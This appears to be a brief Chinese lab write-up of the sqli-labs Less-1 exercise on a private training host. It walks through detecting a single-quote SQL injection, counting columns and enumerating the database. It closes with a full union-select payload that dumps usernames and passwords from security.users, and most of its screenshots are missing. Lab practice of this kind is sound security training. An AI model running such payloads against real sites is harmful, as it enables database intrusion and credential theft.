靶场http://172.16.58.244:83/Less-1/
    1,可控参数是否能影响显示结果
    image.png
    image.png
    2能够报错
    image.png
    判断是单引号注入

    注释 %23 # —+ /*都可以注释

    判断字段
    image.png
    image.png

    查看所有数据库
    image.png

    查看当前数据库

    查看所有字段image.png
    查看当前数据库所有字段
    image.png
    查看数据库字段内容
    因为我们找到了数据库和表,这里可以直接调用
    http://172.16.58.244:83/Less-1/?id=132’ union select 1,group_concat(concat_ws(“:”,username,password)),3 from security.users —+

    security
    image.png